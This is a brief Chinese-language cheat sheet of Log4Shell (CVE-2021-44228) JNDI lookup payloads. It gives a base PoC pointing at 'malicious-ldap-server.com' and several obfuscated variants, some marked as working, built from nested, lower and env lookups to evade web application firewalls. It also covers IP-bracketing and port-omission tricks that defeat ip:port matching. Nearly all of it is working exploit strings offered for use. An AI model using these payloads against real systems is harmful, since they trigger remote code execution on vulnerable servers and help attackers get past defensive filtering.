原来的poc:
${jndi:ldap://malicious-ldap-server.com/a}
绕过的poc:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}
可行
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}
不一定可行
${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}
可行
unico字符串
下列表达式均等价于abc:
a${:-b}c
a${::-b}c
a${E:-a}c
a${xxxanycodexxxx:-b}c
log4j poc集合
https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
● 不出现port,避免被waf匹配ip:port
${jndi:ldap:192.168.1.1/a}
${jndi:ldap:192.168.1.1:/a}
注意此时需要ldap服务端口为389
● 对IP添加包裹
前面两个类的解析逻辑中都有对中括号[]的处理,所以给ip添加一下包裹
${jndi:ldap://[192.168.34.96]/a}
${jndi:ldap://[192.168.34.96]]/a}
LdapURL取出"[ip]",LdapCtx去除[]获得ip,两种情况下端口都是389